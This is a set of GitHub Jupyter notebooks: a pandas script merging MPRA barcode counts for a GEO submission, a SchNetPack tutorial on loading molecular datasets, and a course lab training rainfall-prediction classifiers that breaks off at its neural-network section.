HUES64_rep2_tfxn3["count"] = HUES64_rep2_tfxn3[["count_x", "count_y"]].sum(axis=1)
HUES64_rep2_tfxn3.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep2_tfxn3.head()
```
### HUES64 rep 3
```
for i, f in enumerate(HUES64_rep3_tfxn1_fs):
if i == 0:
HUES64_rep3_tfxn1 = pd.read_table(f, sep="\t")
print(len(HUES64_rep3_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep3_tfxn1 = HUES64_rep3_tfxn1.merge(tmp, on="barcode")
HUES64_rep3_tfxn1["count"] = HUES64_rep3_tfxn1[["count_x", "count_y"]].sum(axis=1)
HUES64_rep3_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep3_tfxn1.head()
for i, f in enumerate(HUES64_rep3_tfxn2_fs):
if i == 0:
HUES64_rep3_tfxn2 = pd.read_table(f, sep="\t")
print(len(HUES64_rep3_tfxn2))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep3_tfxn2 = HUES64_rep3_tfxn2.merge(tmp, on="barcode")
HUES64_rep3_tfxn2["count"] = HUES64_rep3_tfxn2[["count_x", "count_y"]].sum(axis=1)
HUES64_rep3_tfxn2.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep3_tfxn2.head()
for i, f in enumerate(HUES64_rep3_tfxn3_fs):
if i == 0:
HUES64_rep3_tfxn3 = pd.read_table(f, sep="\t")
print(len(HUES64_rep3_tfxn3))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep3_tfxn3 = HUES64_rep3_tfxn3.merge(tmp, on="barcode")
HUES64_rep3_tfxn3["count"] = HUES64_rep3_tfxn3[["count_x", "count_y"]].sum(axis=1)
HUES64_rep3_tfxn3.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep3_tfxn3.head()
```
## mESC rep 1
```
for i, f in enumerate(mESC_rep1_tfxn1_fs):
if i == 0:
mESC_rep1_tfxn1 = pd.read_table(f, sep="\t")
print(len(mESC_rep1_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
mESC_rep1_tfxn1 = mESC_rep1_tfxn1.merge(tmp, on="barcode")
mESC_rep1_tfxn1["count"] = mESC_rep1_tfxn1[["count_x", "count_y"]].sum(axis=1)
mESC_rep1_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
mESC_rep1_tfxn1.head()
```
## mESC rep 2
```
for i, f in enumerate(mESC_rep2_tfxn1_fs):
if i == 0:
mESC_rep2_tfxn1 = pd.read_table(f, sep="\t")
print(len(mESC_rep2_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
mESC_rep2_tfxn1 = mESC_rep2_tfxn1.merge(tmp, on="barcode")
mESC_rep2_tfxn1["count"] = mESC_rep2_tfxn1[["count_x", "count_y", "count"]].sum(axis=1)
mESC_rep2_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
mESC_rep2_tfxn1.head()
```
## mESC rep 3
```
for i, f in enumerate(mESC_rep3_tfxn1_fs):
if i == 0:
mESC_rep3_tfxn1 = pd.read_table(f, sep="\t")
print(len(mESC_rep3_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
mESC_rep3_tfxn1 = mESC_rep3_tfxn1.merge(tmp, on="barcode")
mESC_rep3_tfxn1["count"] = mESC_rep3_tfxn1[["count_x", "count_y", "count"]].sum(axis=1)
mESC_rep3_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
mESC_rep3_tfxn1.head()
```
## 2. write files
```
HUES64_rep1_tfxn1.to_csv("../../../GEO_submission/MPRA__HUES64__rep1__tfxn1.BARCODES.txt", sep="\t", index=False)
HUES64_rep1_tfxn2.to_csv("../../../GEO_submission/MPRA__HUES64__rep1__tfxn2.BARCODES.txt", sep="\t", index=False)
HUES64_rep1_tfxn3.to_csv("../../../GEO_submission/MPRA__HUES64__rep1__tfxn3.BARCODES.txt", sep="\t", index=False)
HUES64_rep2_tfxn1.to_csv("../../../GEO_submission/MPRA__HUES64__rep2__tfxn1.BARCODES.txt", sep="\t", index=False)
HUES64_rep2_tfxn2.to_csv("../../../GEO_submission/MPRA__HUES64__rep2__tfxn2.BARCODES.txt", sep="\t", index=False)
HUES64_rep2_tfxn3.to_csv("../../../GEO_submission/MPRA__HUES64__rep2__tfxn3.BARCODES.txt", sep="\t", index=False)
HUES64_rep3_tfxn1.to_csv("../../../GEO_submission/MPRA__HUES64__rep3__tfxn1.BARCODES.txt", sep="\t", index=False)
HUES64_rep3_tfxn2.to_csv("../../../GEO_submission/MPRA__HUES64__rep3__tfxn2.BARCODES.txt", sep="\t", index=False)
HUES64_rep3_tfxn3.to_csv("../../../GEO_submission/MPRA__HUES64__rep3__tfxn3.BARCODES.txt", sep="\t", index=False)
mESC_rep1_tfxn1.to_csv("../../../GEO_submission/MPRA__mESC__rep1__tfxn1.BARCODES.txt", sep="\t", index=False)
mESC_rep2_tfxn1.to_csv("../../../GEO_submission/MPRA__mESC__rep2__tfxn1.BARCODES.txt", sep="\t", index=False)
mESC_rep3_tfxn1.to_csv("../../../GEO_submission/MPRA__mESC__rep3__tfxn1.BARCODES.txt", sep="\t", index=False)
```
|
github_jupyter
|
# Preparing and loading your data
This tutorial introduces how SchNetPack stores and loads data.
Before we can start training neural networks with SchNetPack, we need to prepare our data.
This is because SchNetPack has to stream the reference data from disk during training in order to be able to handle large datasets.
Therefore, it is crucial to use data format that allows for fast random read access.
We found that the [ASE database format](https://wiki.fysik.dtu.dk/ase/ase/db/db.html) fulfills perfectly.
To further improve the performance, we internally encode properties in binary.
However, as long as you only access the ASE database via the provided SchNetPack `AtomsData` class, you don't have to worry about that.
```
from schnetpack import AtomsData
```
## Predefined datasets
SchNetPack supports several benchmark datasets that can be used without preparation.
Each one can be accessed using a corresponding class that inherits from `DownloadableAtomsData`, which supports automatic download and conversion. Here, we show how to use these data sets at the example of the QM9 benchmark.
First, we have to import the dataset class and instantiate it. This will automatically download the data to the specified location.
```
from schnetpack.datasets import QM9
qm9data = QM9('./qm9.db', download=True)
```
Let's have a closer look at this dataset.
We can find out how large it is and which properties it supports:
```
print('Number of reference calculations:', len(qm9data))
print('Available properties:')
for p in qm9data.available_properties:
print('-', p)
```
We can load data points using zero-base indexing. The result is a dictionary containing the geometry and properties:
```
example = qm9data[0]
print('Properties:')
for k, v in example.items():
print('-', k, ':', v.shape)
```
We see that all available properties have been loaded as torch tensors with the given shapes. Keys with an underscore indicate that these names are reserved for internal use. This includes the geometry (`_atomic_numbers`, `_positions`, `_cell`), the index within the dataset (`_idx`) as well as information about neighboring atoms and periodic boundary conditions (`_neighbors`, `_cell_offset`).
<div class="alert alert-info">
**Note:** Neighbors are collected using an `EnvironmentProvider`, that can be passed to the `AtomsData` constructor. The default is the `SimpleEnvironmentProvider`, which constructs the neighbor list using a full distance matrix. This is suitable for small molecules. We supply environment providers using a cutoff (`AseEnvironmentProvider`, `TorchEnvironmentProvider`) that are able to handle larger molecules and periodic boundary conditions.
</div>
We can directly obtain an ASE atoms object as follows:
```
at = qm9data.get_atoms(idx=0)
print('Atoms object:', at)
at2, props = qm9data.get_properties(idx=0)
print('Atoms object (not the same):', at2)
print('Equivalent:', at2 == at, '; not the same object:', at2 is at)
```
Alternatively, all property names are pre-defined as class-variable for convenient access:
```
print('Total energy at 0K:', props[QM9.U0])
print('HOMO:', props[QM9.homo])
```
## Preparing your own data
In the following we will create an ASE database from our own data.
For this tutorial, we will use a dataset containing a molecular dynamics (MD) trajectory of ethanol, which can be downloaded [here](http://quantum-machine.org/gdml/data/xyz/ethanol_dft.zip).
```
import os
if not os.path.exists('./ethanol_dft.zip'):
!wget http://quantum-machine.org/gdml/data/xyz/ethanol_dft.zip
if not os.path.exists('./ethanol.xyz'):
!unzip ./ethanol_dft.zip
```
The data set is in xyz format with the total energy given in the comment row. For this kind of data, we supply a script that converts it into the SchNetPack ASE DB format.
```
schnetpack_parse.py ./ethanol.xyz ./ethanol.db
```
In the following, we show how this can be done in general, so that you apply this to any other data format.
First, we need to parse our data. For this we use the IO functionality supplied by ASE.
In order to create a SchNetPack DB, we require a **list of ASE `Atoms` objects** as well as a corresponding **list of dictionaries** `[{property_name1: property1_molecule1}, {property_name1: property1_molecule2}, ...]` containing the mapping from property names to values.
```
from ase.io import read
import numpy as np
# load atoms from xyz file. Here, we only parse the first 10 molecules
atoms = read('./ethanol.xyz', index=':10')
# comment line is weirdly stored in the info dictionary as key by ASE. here it corresponds to the energy
print('Energy:', atoms[0].info)
print()
# parse properties as list of dictionaries
property_list = []
for at in atoms:
# All properties need to be stored as numpy arrays.
# Note: The shape for scalars should be (1,), not ()
# Note: GPUs work best with float32 data
energy = np.array([float(list(at.info.keys())[0])], dtype=np.float32)
property_list.append(
{'energy': energy}
)
print('Properties:', property_list)
```
Once we have our data in this format, it is straightforward to create a new SchNetPack DB and store it.
```
%rm './new_dataset.db'
new_dataset = AtomsData('./new_dataset.db', available_properties=['energy'])
new_dataset.add_systems(atoms, property_list)
```
Now we can have a look at the data in the same way we did before for QM9:
```
print('Number of reference calculations:', len(new_dataset))
print('Available properties:')
for p in new_dataset.available_properties:
print('-', p)
print()
example = new_dataset[0]
print('Properties of molecule with id 0:')
for k, v in example.items():
print('-', k, ':', v.shape)
```
The same way, we can store multiple properties, including atomic properties such as forces, or tensorial properties such as polarizability tensors.
In the following tutorials, we will describe how these datasets can be used to train neural networks.
|
github_jupyter
|
```
### ATOC5860 Application Lab #6 - supervised machine learning
### Coded by Eleanor Middlemas (Jupiter, formerly University of Colorado, elmiddlemas at gmail.com)
### Additional code/commenting by Jennifer Kay (University of Colorado)
### Last updated April 6, 2022
import pandas as pd
import numpy as np
import datetime
import time
```
*In this notebook, we will use supervised machine learning models to:*
**1) Predict the likelihood of rainfall given certain atmospheric conditions.**
After prepping the data, we will build and train four machine learning models to make the predictions: Logistic regression, Random Forest, Singular vector machines/classifier, Neural Network
**2) Determine which variable ("feature") is the best predictor of rainfall, i.e., "feature importance"**
## STEP 1: Read in the Data into a pandas dataframe and Look At It
```
# read in the data
df = pd.read_csv("christman_2016.csv")
# preview data (also through df.head() & df.tail())
df
df.day.nunique() ## Print the answer to: How many days are in this dataset?
##Optional: transform the day column into a readable date. Run this ONCE.
df['day'] = [datetime.date.fromordinal(day+693594) for day in df['day']]
```
## STEP 2: Data and Function Preparation
Data preparation is a huge part of building Machine Learning model "pipelines". Carefully think through building & training a Machine Learning model before you run it. There are a few statistical "gotchas" that may result in your model being biased, inaccurate, or not suitable for the problem at hand. Address these 6 questions!
**Q1: What exactly are we trying to predict? A value, an outcome, a category?** Define your predictors and predictand. Relate these to your hypothesis or overarching question. In our case, our predictand is the likelihood of precipitation. We will build models to predict the likelihood that it's currently precipitating, given current atmospheric conditions.
**Q2: Do you have any missing data? If so, how will you handle them?** Keep in mind, decreasing the number of input observations may bias your model. Using the Christman dataset, we have no missing data.
**Q3: Do you have any categorical or non-numeric variables or features?** If so, you must figure out how to encode them into numbers. Luckily, in the geosciences, we rarely run into this problem.
**Q4: How will we validate our model?** Typically, people split their existing data into training data and testing data, or perform "cross-validation" or a "test-train split". That is, we will "hold out" some data and call it our "testing data", while using the rest of the data to train our model (i.e., "training data"). Once our model is trained, we will evaluate its performance with the holdout testing data. Note: This could be problematic if there is limited data.
**Q5: Do your features have the same variance?** You need to consider this to ensure your model doesn't overly depend on one variable with large variance. This step is called "feature scaling". Features of the same size also speed up the Gradient Descent algorithm.
**Q6: If classification is the goal, are there the same number of observations for each feature and outcome? If not, how will you rebalance?** Here, the Christman dataset has same number of observations (8784) for each feature. But, times with no precipitation are way more common than times with precipitation. To deal with this issue, we will oversample the observations associated with precip so that the two outcomes (or "classes") are equal. Note: It's important that feature scaling or normalization is performed before any rebalancing so that the qualitative statistics (mean, stddev, etc) remain the same.
**Q7: Which metrics are appropriate for assessing your model?** Consider the bias-variance trade-off, and whether having false positives or false negatives is more impactful. In our case, predicting no rain when there is rain (false negative) is probably more frustrating and potentially more impactful than the other way around (a false positive).
**Q1. What exactly are you trying to predict?**
First, split data into predictor & predictands.
```
##Create a new feature that indicates whether precipitation occurred. Perform this step ONCE.
#print(df.columns) # print if you need to see what is the variable called that indicates precipitation amount?
df['prec_occur'] = np.array(df.Prec_inches!=0).astype(int)
#Next, select the data that will be predictors.
predictors = df.copy(deep=True) # here, we use "deep = True" so that changes to predictors won't be made to the df.
#Next, we drop some variables that shouldn't be used to predict whether or not there is rain.
predictors = df.drop(['day','hour','Prec_inches'],axis=1)
predictors
## Great, that worked. Now I will assign everything but "prec" to be the predictor array "x",
## and prec will be the predictand vector "y".
x = predictors.drop('prec_occur',axis=1)
y = predictors.prec_occur
```
**Q2 & Q3 do not need to be addressed in our dataset.**
**Q4. How will you validate your model?**
We will perform a test-train split to validate our trained model. This step must be performed before each time the model is trained to ensure we are not baking in any bias among the models we train. That also means the following two steps must also be performed prior to training each model as well. For this reason, we write functions to call
easily before each model training.
```
from sklearn.model_selection import train_test_split
from random import randint
def define_holdout_data(x, y, verbose):
"""Perform a 80/20 test-train split (80% of data is training, 20% is testing). Split is randomized with each call."""
random_state = randint(0,1000)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.20, random_state=random_state)
if verbose==True:
print("Prior to scaling and rebalacing...")
print("Shape of training predictors: "+str(np.shape(x_train)))
print("Shape of testing predictors: "+str(np.shape(x_test)))
print("Shape of training predictands: "+str(np.shape(y_train)))
print("Shape of testing predictands: "+str(np.shape(y_test)))
print(" ")
return x_train, x_test, y_train, y_test
```
**Q5. Do your features have the same variance?**
We must normalize the features. In machine learning this is called Feature Scaling". We do this so that the features with the largest variance are note weighted more heavily than those with less variance. Note: If our predictand wasn't binary, then we would normalize it as well.
We'll keep the data as a pandas dataframe rather than converting it to a numpy array beforehand. The "fit_transform" function outputs a numpy array, but we will convert back to a dataframe so that re-balancing the dataset is easier.
```
from sklearn import preprocessing
def scale_data(x_train, x_test):
"""
Scale training data so that model reaches optimized weights much faster.
*All data that enters the model should use the same scaling used to scale the training data.*
Thus, we also perform scaling on testing data for validation later.
Additionally, we return the scaler used to scale any other future input data.
"""
scaler = preprocessing.MinMaxScaler() # normalize
x_train_scaled = pd.DataFrame(data=scaler.fit_transform(x_train),index=x_train.index,columns=x_train.columns)
x_test_scaled = pd.DataFrame(data=scaler.transform(x_test),index=x_test.index,columns=x_test.columns)
return scaler, x_train_scaled, x_test_scaled
```
**Q6. Are there the same number of observations for each outcome or class?**
Luckily, we have the same number of observations for each feature (8784). But do we have the same number of outcomes for our predictand?
```
df['prec_occur'].value_counts()
```
**Answer:** Definitely not. The outcomes we are trying to predict are extremely unbalanced. Non-precip hours occur 30x more than precip hours. This class imbalance may bias the model because precip hours are underrepresented, which means the model won't have as many instances of precip hours to learn to distinguish precip hours from non-precip hours.
There are a number of out-of-the-box functions that resample data very precisely. The one I use below simply randomly oversamples the existing precipitating observation data to balance the dataset.
Note: This function should be called on both training and testing data separately.
```
from sklearn.utils import resample
def balance_data(x,y,verbose):
"""Resample data ensure model is not biased towards a particular outcome of precip or no precip."""
# Combine again to one dataframe to ensure both the predictor and predictand are resampled from the same
# observations based on predictand outcomes.
dataset = pd.concat([x, y],axis=1)
# Separating classes
raining = dataset[dataset['prec_occur'] == 1]
not_raining = dataset[dataset['prec_occur'] == 0]
random_state = randint(0,1000)
oversample = resample(raining,
replace=True,
n_samples=len(not_raining), #set the number of samples to equal the number of the majority class
random_state=random_state)
# Returning to new training set
oversample_dataset = pd.concat([not_raining, oversample])
# reseparate oversampled data into X and y sets
x_bal = oversample_dataset.drop(['prec_occur'], axis=1)
y_bal = oversample_dataset['prec_occur']
if verbose==True:
print("After scaling and rebalacing...")
print("Shape of predictors: "+str(np.shape(x_bal)))
print("Shape of predictands: "+str(np.shape(y_bal)))
print(" ")
return x_bal, y_bal
```
**For ease, let's put the data prep code from questions 1-6 into a pipeline. In other words we will write a single function to accomplish everything we have done so far in this notebook.**
```
def dataprep_pipeline(x, y, verbose):
""" Combines all the functions defined above so that the user only has to
call one function to do all data pre-processing. """
# verbose=True prints the shapes of input & output data
# split into training & testing data
x_train, x_test, y_train, y_test = define_holdout_data(x, y, verbose)
# perform feature scaling
scaler, x_train_scaled, x_test_scaled = scale_data(x_train, x_test)
# rebalance according to outcomes (i.e., the number of precipitating
# observations & non-precipitating outcomes should be equal)
if verbose==True:
print("for training data... ")
x_train_bal, y_train_bal = balance_data(x_train_scaled, y_train, verbose)
if verbose==True:
print("for testing data... ")
x_test_bal, y_test_bal = balance_data(x_test_scaled, y_test, verbose)
return x_train_bal, y_train_bal, x_test_bal, y_test_bal
```
**Q7. What are the appropriate metrics for assessing your model?**
These metrics will be used to evaluate each model after training.
Below are some commonly-used metrics for assessing the value of a given Machine Learning model.
"**True Positive (TP)**" Is the number of times the model predicts a positive when the observation is actually positive. In our case, the model predicts that its raining when it is actually raining.<br>
"**False Positive (FP)**" The number of times the model guesses that it's raining when it's not actually raining.<br>
The same applies to **True Negatives (TN)** (correctly predicting that it's not raining) and **False Negatives (FN)** (predicting no rain when it's actually raining).
- **Precision = TP/(TP + FP)**: The proportion of predicted precipitating events that are actually precipitating.
- **Accuracy = (TP + TN)/(total)**: The proportion of precipitating hours or non-precipitating hours that are correctly predicted by the model.
- **Recall = TP/(TP + FN)**: The proportion of precipitating hours that are correctly predicted by the model.<br>
<br>
Other important metrics that we aren't going to look at today:
- **F1**: a way to capture how well the model predicts the hours that it's actually precipitating.
- **ROC/AUC**: how well the model separates precipitating hours from non-precipitating hours.
```
from sklearn import metrics
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, roc_auc_score, confusion_matrix
import matplotlib.pyplot as plt
import seaborn as sns
# Print rounded metrics for each model.
def bin_metrics(x, y):
"""Prints accuracy and recall metrics for evaluating
classification predictions."""
accuracy = metrics.accuracy_score(x, y)
recall = metrics.recall_score(x, y)
print('Accuracy:', round(accuracy, 4))
print('Recall:', round(recall, 4))
return accuracy, recall
# Plot confusion matrix
def plot_cm(x, y):
"""Plots the confusion matrix to visualize true
& false positives & negatives"""
cm = confusion_matrix(x, y)
df_cm = pd.DataFrame(cm, columns=np.unique(x), index = np.unique(x))
df_cm.index.name = 'Actual'
df_cm.columns.name = 'Predicted'
sns.heatmap(df_cm, cmap="Blues", annot=True,annot_kws={"size": 25}, fmt='g')# font size
plt.ylim([0, 2])
plt.xticks([0.5, 1.5], ['Negatives','Positives'])
plt.yticks([0.5, 1.5], ['Negatives','Positives'])
```
Another way we can evaluate the models is to compare precipitation likelihood given the same set of atmospheric conditions. First, let's choose some observation in the pre-scaled dataset shows that it's raining, and then find the corresponding scaled observation:
```
def rand_atmos_conditions_precip(index='rand'):
"""
Function returns atmospheric conditions in a dataframe as well as the scaled
conditions in a numpy array so that they output a prediction in the model.
If no input is passed, the function will randomly generate an in index to
choose from those observations in some training data with precipitation.
Otherwise, an integer index between 0 and 200 should be passed.
"""
# First, perform a test-train split
x_train, x_test, y_train, _ = define_holdout_data(x, y, verbose=False)
# perform feature scaling
_, x_train_scaled, _ = scale_data(x_train, x_test)
# this is what will go into the model to output a prediction
if index=='rand':
index = randint(0,len(y_train[y_train==1].index))
precipindex = y_train[y_train==1].index.values[index]
testpredictor = x_train_scaled.loc[precipindex]
return df.iloc[precipindex], testpredictor
```
## STEP 3: Train & Compare Machine Learning Models
Each section below goes through building and training a ML model. In each section, there are a few steps for each model "pipeline":
1. __Randomly perform a test-train split, feature scaling, and resample data to ensure outcomes are balanced__.
2. __Train your model__.
3. __Assess model metrics with testing and training data__. We begin by first assessing each model's performance by calculating the metrics defined above on the *testing* or *holdout* data; the key here is that the model has never seen this data. <br>__If applicable, tune your model.__ This means choosing new *hyperparameters*, retraining the model, and then reassessing the same model metrics to see if the model yields better results.
3. __Check for model overfitting__. We will also check to see if the model is overfitting by comparing metrics of the testing data to that of the training data. In short, the training data should not be outperforming the testing data.
4. __Actually make a prediction with a single observation__. Predicted precipitation probability provides a sanity test for us to make sure the model isn't way off base. It allows us to see for ourselves: given X meteorological conditions and our own understanding of meteorology, would rain seem likely? Is the model actually doing something realistic?
## Model 1: Logistic Regression
```
from sklearn.linear_model import LogisticRegression
## 1. Perform a test-train split, perform feature scaling, and the rebalance our dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=True)
## 2. Train the Logistic Regression model
# initialize the model
lr = LogisticRegression(solver='lbfgs')
# we choose this particular solver because we're not regularizing or penalizing certain features
# fit the model to scaled & balanced training data. Side note: this is where *Gradient Descent* occurs.
lr.fit(x_train_bal, y_train_bal);
## 3. Assess Logistic Regression's performance using testing data
##Now that we've "trained" our model, we make predictions using data that the
## model has never seen before (i.e., our holdout testing data) to see how it performs.
y_pred = lr.predict(x_test_bal)
# Call functions defined above to calculate metrics & plot a confusion matrix based on
# how well model simulates testing data
#plot_cm(y_test_bal, y_pred);
lr_acc, lr_rec = bin_metrics(y_test_bal, y_pred)
```
Accuracy tells is the percent of correct predictions, whether precipitating or not. The Logistic Regression model, without any additional tuning, can correctly predict whether it's precipitating or not given a set of present atmospheric conditions around 84% of the time.
False Positives are less harmful than False Negatives. Thus, along with accuracy, we should also try to maximize recall.
A very important aspect of tuning machine learning model is to ensure the model isn't overfitting or underfitting:
An overfit model means the model is fit very well to the training data, but fails to generalize predictions outside the training dataset. A symptom of overfitting is that the models' training accuracy is much better than the testing accuracy. Overfitting can happen more easily in more complex models, like neural networks. To alleviate overfitting, one needs to reduce variance, through feature regularization, lowering model complexity, or performing k-folds cross-validation.
Before you dive too deeply into ML and in your own time, I suggest watching this (https://www.youtube.com/watch?v=EuBBz3bI-aA) 6-minute StatQuest YouTube video to develop more intuition for model error.
```
##4. Check to see if the Logistic Regression model is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
# Compare testing data metrics to data training metrics.
print("Training metrics:")
pred_train= lr.predict(x_train_bal)
bin_metrics(y_train_bal,pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, y_pred);
## 5. Make a prediction with the Logistic Regression model
#First, we randomly choose some atmospheric conditions using the function defined above. This will be the atmospheric conditions we use for all models we build.
origvals, testpredictor = rand_atmos_conditions_precip()
#print(origvals) # observation from original dataframe
print(testpredictor) # scaled observation
# prediction output is in the format [probability no rain, probability rain]
lr_prediction = lr.predict_proba(np.array(testpredictor).reshape(1, -1))[0][1]*100
print("The meteorological conditions are: ")
print(origvals)
print(" ")
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(lr_prediction, digits=2))
```
## Model 2: Random Forest
To understand random forests, one must first understand a [decision tree](https://scikit-learn.org/stable/modules/tree.html#tree). A decision tree is intuitive: it is essentially a flowchart to point to an outcome based on "decisions" for each feature. A Random Forest is an ensemble of decision trees that are randomly constructed based on the features of the dataset and number of decisions. Trees are constructed by randomly choosing a feature to "seed" each tree, and then making rules or associations with other features to lead to the specified outcome.
```
from sklearn.ensemble import RandomForestClassifier
##1. Perform a test-train split, perform feature scaling, and the rebalance our dataset.
## Perform a train-test split for cross-validation, perform feature scaling, and
## rebalance each testing & training dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=False)
##2. Train (and tuning) the Random Forest model
##Choosing hyperparameters: There are many hyperparameters one can decide upon when tuning the
## Random Forest classifier. The two we will adjust are: 1) The number of estimators or "trees" in the forest
## 2) The depth of the tree, or how many "decisions" are made until convergence is reached.
acc_scores = []
rec_scores = []
num_est = [10, 50, 500] # number of trees
depth = [2, 10, 100] # number of decisions
for i in num_est:
start = time.time()
print("Number of estimators is "+str(i))
for k in depth:
print("depth is "+str(k))
forest = RandomForestClassifier(n_estimators=i, max_depth=k)
forest.fit(x_train_bal, y_train_bal)
# cross validate & evaluate metrics based on testing data
pred_test= forest.predict(x_test_bal)
acc_val = metrics.accuracy_score(y_test_bal, pred_test)
acc_scores.append(acc_val)
rec_val = metrics.recall_score(y_test_bal, pred_test)
rec_scores.append(rec_val)
end = time.time()
print("Random Forest took "+str(end-start)+" seconds.")
### visualize the recall and accuracy scores for the different hyperparameter choices
plt.plot(acc_scores, marker='o', color='black',label='accuracy')
plt.plot(rec_scores, marker='o', color='blue',label='recall')
plt.xlabel('Hyperparameter Choice')
plt.ylabel('Score')
plt.legend()
print("Max Accuracy (black):", round(max(acc_scores), 4))
print("Max Recall (blue):", round(max(rec_scores), 4))
```
Which choice of hyperparameters should we pick? Choosing the right hyperparameters for this model requires revisiting which metrics are most important to our question. For this problem, we want to maximize both recall and accuracy.
Let's go with the parameters corresponding to x=0 (Looks good for both accuracy and recall!) but try other hyperparameters too (if you have time)
```
forest = RandomForestClassifier(n_estimators=10, max_depth=2);
forest.fit(x_train_bal, y_train_bal);
## 3. Assess the Random Forest's performance using testing data
##Once again, we will use our testing data to make an initial evaluation of how the model is doing.
pred_test= forest.predict(x_test_bal)
# Call functions defined above to calculate metrics & plot a confusion matrix based on
# how well model simulates testing data
forest_acc, forest_rec = bin_metrics(y_test_bal, pred_test)
plot_cm(y_test_bal, pred_test)
## 4. Check to see if the Random Forest is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
# Compare testing data metrics to data training metrics.
print("Training metrics:")
rf_pred_train= forest.predict(x_train_bal)
bin_metrics(y_train_bal,rf_pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, pred_test);
```
WOW - the random forest model was not an improvement over the logistical regression model.
Random forests seldom overfit, but if they do, one should try increasing the number of trees, or decreasing the amount of data used to construct each tree. See scikit-learn's Random Forest Classifier webpage (https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html) for information on more hyperparameters one can tune to address overfitting.
```
##5. Make a prediction with the Random Forest
# prediction output is in the format [probability no rain, probability rain]
forest_prediction = forest.predict_proba(np.array(testpredictor).reshape(1, -1))[0][1]*100
print("The meteorological conditions are: ")
print(origvals)
print(" ")
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(forest_prediction, digits=2))
```
## Model 3: Support Vector Machines (SVMs)
SVMs divide observations into classes based on maximizing the distance between a "kernel" (basically a dividing function) and the elements of each feature/class/variable on a plane. Because the relationships between atmospheric variables and precipitation are inherently non-linear, we will choose a non-linear, "RBF" kernel.
```
from sklearn import svm
## 1. Perform a test-train split, perform feature scaling, and the rebalance our dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=False)
```
Choosing hyperparameters
In the case of SVMs, we can tune "C", the regularization parameter. Regularization) penalizes higher-order coefficients during training (i.e., Gradient Descent). Regularization is a way to reduce a model's complexity and address overfitting.
In SVMs, the lower the regularization parameter C, the higher the penalty. We are unsure what the C value should be. Thus, we train the model three times, each with a different value of C to see what the best value should be. I highly suggest learning more on regularization if you choose to pursue ML methods on your own.
```
## 2. Train (and tune) the SVM (Note: this cell takes ~1 minute to run)
acc_scores = []
rec_scores = []
C_range = [0.01, 1, 100]
for i in C_range:
start = time.time()
print("C is... "+str(i))
svmclassifier = svm.SVC(C=i, kernel='rbf', gamma='scale', max_iter=20000, probability=True)
svmclassifier.fit(x_train_bal, y_train_bal)
# Save model metrics in order to choose best hyperparameter
pred_test= svmclassifier.predict(x_test_bal)
acc_val = metrics.accuracy_score(y_test_bal, pred_test)
acc_scores.append(acc_val)
rec_val = metrics.recall_score(y_test_bal, pred_test)
rec_scores.append(rec_val)
end = time.time()
print("Took "+str(end-start)+" seconds to train.")
plt.plot(C_range, acc_scores, marker='o', color='black',label='accuracy')
plt.plot(C_range, rec_scores, marker='o', color='blue',label='recall')
plt.xlabel('Hyperparameter Choice')
plt.xscale('log')
plt.ylabel('Score')
plt.legend()
print("Max Accuracy (black):", round(max(acc_scores), 4))
print("Max Recall (blue):", round(max(rec_scores), 4))
```
The SVM with C=1, i.e., a medium weight penalty, results in a balance among accuracy, precision, and recall.
We will train our final model with this hyperparameter.
```
# Define SVM classifier & fit to training data
svmclassifier = svm.SVC(C=1, kernel='rbf', gamma='scale', max_iter=20000, probability=True)
svmclassifier.fit(x_train_bal, y_train_bal);
## 3. Assess SVM performance using testing data
pred_test= svmclassifier.predict(x_test_bal)
# Call functions defined above to calculate metrics & plot a confusion matrix based on
# how well model simulates testing data
svm_acc, svm_rec = bin_metrics(y_test_bal, pred_test)
plot_cm(y_test_bal, pred_test)
```
WOW: using a non-linear Singular Vector Machine instead of a Logistic Regressor increased the recall and accuracy.
```
## 4. Check to see if the SVM is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
# Compare testing data metrics to data training metrics.
print("Training metrics:")
svm_pred_train= svmclassifier.predict(x_train_bal)
bin_metrics(y_train_bal,svm_pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, pred_test);
```
One can address overfitting in an SVM by changing the kernel to a simpler kernel, or tuning the regularization parameter C.
```
## 5. Make a prediction with the SVM
# prediction output is in the format [probability no rain, probability rain]
svm_prediction = svmclassifier.predict_proba(np.array(testpredictor).reshape(1, -1))[0][1]*100
print("The meteorological conditions are: ")
print(origvals)
print(" ")
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(svm_prediction, digits=2))
```
## Model 4: Neural Network
Note: there is a TON of information online about Neural Networks. Eleanor Recommends:
